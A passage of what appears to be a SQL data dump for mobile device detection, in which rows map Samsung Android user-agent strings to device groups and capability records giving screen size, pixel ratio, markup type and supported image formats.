Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I8580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9152) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9190) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9192) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9192I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9195) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9195-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9195I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9205) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":711,\"pixelRatio\":1.8,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9300) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9300I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9301I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9305) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-I9515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-P5100) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-P5200) AppleWebKit/* (KHTML, like Gecko) Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S6310) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S6310N) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7270) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7270L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7272) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7273T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7275R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7580) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG GT-S7710) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SCH-I545) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SGH-M919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SGH-T399N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A300FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A300FU-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A500FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A500FU-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-A700FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-C101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-E500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-E500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G318H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G318H-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G318HZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G318ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G350) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G355HN) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G357FZ) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G357M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G360F) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G3815) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G386T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G386T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G388F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G7102) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G7105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G7105-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G750H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G800F-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G800H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G850F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G900F-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G900H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G900I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-G900P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J100F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J100FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J100H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J100M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-J100MU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 